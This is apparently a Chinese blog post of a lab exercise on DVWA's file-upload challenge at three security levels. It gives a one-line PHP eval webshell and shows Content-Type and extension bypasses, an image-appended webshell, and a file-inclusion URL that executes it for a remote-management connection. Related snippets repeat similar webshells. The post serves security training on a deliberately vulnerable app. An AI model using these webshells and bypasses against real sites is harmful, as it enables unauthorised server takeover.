DVWA--文件上传(初中高)

最新推荐文章于 2024-05-14 14:42:10 发布
最新推荐文章于 2024-05-14 14:42:10 发布
阅读量1.6k 收藏 5
点赞数 2
分类专栏: DVWA 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/firecjh/article/details/131131670
版权

任务一:文件上传初级

实验环境:

配置DVWA平台,点击File Upload

进入DVWA平台,选择DVWA Security,将安全级别设置为low。

步骤:

  1. 上传一句话木马文件,给出上传成功的截图,一句话木马文件名用自己姓名拼音命名,比如lwx.php

<?php @eval($_POST['a']);?>

  1. 用蚁剑连接,给出蚁剑测试连接成功的截图以及连接到网站后台的截图。

任务一:文件上传中级

配置DVWA平台, 点击File Upload

进入DVWA平台,选择DVWA Security,将安全级别设置为Medium。

  1. 源码分析,中级加了什么过滤方式

  1. 方法1:使用Content-Type过滤绕过。(木马文件以自己姓名拼音命名)
  1. 使用bp抓包将php文件的的Content-Type改为将content-type改为image/jpeg或者image/png

  1. 上传一句话木马。给出上传成功的截图。

  1. 使用蚁剑连接。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。

  1. 方法2:前端JS过滤绕过。(木马文件以自己姓名拼音命名)

1)将木马文件命名为.jpg或者png,绕过前端JS的验证, 用bp抓包,在将文件扩展名改成.php,因为后端没有验证,这样就可以成功上传扩展名为.php的木马。

2)上传一句话木马。给出上传成功的截图。

3)使用蚁剑连接。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。

任务二:文件上传高级

配置DVWA平台, 点击File Upload

进入DVWA平台,选择DVWA Security,将安全级别设置为High。

  1. 源码分析,高级加了什么过滤。

  1. 制作图片马,图片马用自己的姓名的拼音命名。
  1. copy /b 1.png+lwx.php 2.png

2)查看图片马最后被追加的一句话木马。

  1. 上传图片马,给出上传成功的截图。

  1. 分析此时用蚁剑连接图片马失败的原因。

此时由于图片马中的php代码并没有被解析,所以不能直接使用蚁剑进行连接,需要配合其他漏洞。 此时可以结合文件包含漏洞获取webshell

  1. 利用文件包含漏洞解析并执行代码。

点到file Inclusion。此时的级别为high。将page换成我们要包含的木马文件路径:

page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png,并验证文件包含漏洞是否利用成功。

(以自己电脑实际路径和命名为准)

  1. 用蚁剑连接,并添加cookie头。

url中输入包含图片马的的链接:

http://192.168.56.144/DVWA-master/vulnerabilities/fi/?page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png

(以自己电脑实际路径为准)

添加cookie

成功连接蚁剑

  1. 分析第六步中连接蚁剑时为什么要加cookie头。

一句话木马的话,把木马写入了目标机,直接连接的时候就不用设置cookie,如果是通过文件包含来连接,就需要设置cookie,因为dvwa/vulnerabilities/fi路径下的index.php文件(也就是存在文件包含漏洞的文件)是需要验证cookie才能访问的。

像雾若雨又如风
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-master.zip
01-04
DVWA由多个安全级别组成,包括“低”、“中”、“”和“不可能”,每个级别都包含不同类型的漏洞。这些级别的划分是为了让学习者能够逐步深入,从简单的漏洞开始,逐渐挑战更复杂的攻击场景。例如,“SQL注入”、...
DVWA】18. File Upload 文件上传High+Impossible)
Zichel77的博客
01-11 1096
验证文件内容:代码使用getimagesize()函数来验证上传文件的内容是否为有效的图像。移动文件:如果上传的文件通过了所有检查,代码使用move_uploaded_file()函数将文件移动到目标路径。这是为了确保上传的文件位于安全的目录中,并且可以通过正确的URL访问。生成目标路径:代码使用basename()函数获取上传文件的基本名称,并将其附加到服务器上的目标路径上。移动文件:如果上传的文件通过了所有验证,代码使用move_uploaded_file()函数将文件从临时路径移动到目标路径。
DVWA通关攻略之文件上传
勿山几已
05-22 2372
简要介绍文件上传漏洞及其利用
Minio 教程 - Minio WebUploader上传文件的级用法之进度条显示、文件过滤、图片预览、图片压缩
最新发布
qq_33240556的博客
05-14 423
在使用 Minio 作为后端存储服务时,结合 WebUploader 这类前端上传组件,可以实现复杂的上传功能,比如进度条显示、文件过滤、图片预览和图片压缩。
DVWA靶场系列(四)—— File Upload(文件上传
qq_45612828的博客
07-12 5835
DVWA靶场系列(四)—— File Upload(文件上传
DVWA靶场之文件上传(三个等级)
m0_55854679的博客
05-02 9004
文件上传 文件上传的要点:(1)绕过题目的各种过滤手段成功上传文件并且不被删除; (2)确保文件可以正常运行; (3)确保文件可以执行命令。 一句话木马(简称Webshell) <?php @eval($_POST['cmd']); ?> 基本原理 利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑或者中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['cmd']表示从页面中获
如何用dvwa靶场上传文件,再用中国蚁剑连接(high
m0_73128456的博客
11-12 2807
单击右键,点击浏览网站,然后把dvwa后面全部删除,再按回车键,输入自己靶场的用户名和密码,再把密码等级改为级(high)然后,再找cookie值。第五步:打开中国蚁剑,增加数据,然后填写URL地址,填写自己的文件上传的位置。连接密码,这个时候,返回值为空,不要着急,只要你如下填写就行。前面是自己的IP地址,后面是自己上传文件的位置。第八步:点击你的数据,右键选择编辑数据,然后,点击请求信息,点击。第六步:先保存数据,现在还不可以,还要加靶场的cookie值。然后,加cookie值,粘贴,向我这样。
DVWA篇_文件上传
求大佬师傅带
05-25 1356
记一次DVWA文件上传漏洞复现
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
dvwa中的文件上传漏洞
无痕的博客
01-12 7841
dvwa漏洞环境演示文件上传漏洞
DVWA的upload文件上传漏洞(全难度)(小白向)
xihaxiha9的博客
04-19 2486
DVWA文件上传详解
文件上传DVWA文件上传攻略
wj33333的博客
11-17 439
通过源码分析我们可以看到,他对上传的文件类型进行过滤,只允许image/jpeg和image/png文件上传,否则不成功,但是他没有审核内容,所以我们使用图片木马轻松绕过,配合中国蚁剑拿到权限.我们通过源码可以看到对于文件上传没有做任何过滤,允许所有文件进行上传.所有我们使用一句话木马,配合中国蚁剑就能成功拿到权限.我们要修改图片后缀为php,(因为要和中国蚁连接)放包.但是我们已经将木马图片上传成功,所以尝试使用文件包含。或者上传图片抓包.将一句话木马写到图片后面。上传图片木马成功了.
Dvwa文件上传级别学习笔记
Mbys_Lettuce的博客
09-21 1638
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。本次实验目标为利用上传的木马文件,获取目标服务器的权限,木马文件内容为:
DVWA 之 File Upload(文件上传
RexHa的博客
10-02 2660
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
5、DVWA——文件上传
qq_55202378的博客
09-11 735
DVWA 文件上传
DVWA文件上传漏洞
weixin_56306210的博客
02-13 4225
DVWA文件上传
DVWA靶场--文件上传漏洞(low、medium、high等级)
c_programj的博客
04-16 8019
dvwa靶场实践-低中三个安全等级安全等级:Low安全等级:Medium安全等级:High 关于Webshell Webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。 小马:一句话木马也称为了小马,即整个shell代码量只有一行,一般是系统执行函数。 大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到。 shell2.php #eval使用php函数,例如phpinfo( ) <?php eval($_REQUEST[‘cmd’]);?
DVWA靶场之文件上传通关详解
qq_62169455的博客
06-27 1591
通过查看该等级的源码,可以看到该等级对上传的文件没有任何限制和过滤,存在明显的上传漏洞,成功上传后就会显示出路径+successfully uploaded 上传失败则会提示your image was not uploaded。然后访问dvwa文件中的uploads对应的文件位置D:\phpstudy_pro\phpstudy_pro\WWW\DVWA\hackable\uploads,就可以看到刚刚上传的muma.php已经上传成功。最后使用蚁剑连接,出现如图所示界面,到这里,medium就完成了。
dvwa-master zip
07-28
dvwa-master zip是一个开源的漏洞脆弱性应用程序,用于进行网络安全测试和漏洞扫描。 具体而言,dvwa-master zip是一个基于PHP和MySQL开发的靶场平台,旨在帮助用户了解和学习网络安全漏洞。它模拟了多种常见的Web应用程序漏洞,如SQL注入、XSS跨站脚本攻击、命令执行等,用户可以通过对这些漏洞进行测试和攻击来提自己的网络安全意识和技能。 dvwa-master zip的安装非常简便,只需将其解压到服务器的Web目录下,并配置好数据库连接信息即可。一旦安装完成,用户就可以通过浏览器访问dvwa-master zip的前端界面,并开始进行安全测试和漏洞扫描。 dvwa-master zip提供了多个不同的安全级别,从易到难,供用户选择。在低级别中,漏洞和脆弱性的例子会更为简单和明显;而在级别中,这些漏洞将会更加难以察觉和利用,需要用户具备更的技术水平。 通过dvwa-master zip,用户可以模拟和测试真实的网络安全风险,学习如何防范和修复相关漏洞。它对于安全工程师、渗透测试人员、Web开发人员等具有较的教育和培训价值。值得注意的是,dvwa-master zip仅用于合法的安全研究和学习目的,未经授权的攻击行为是不被允许的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值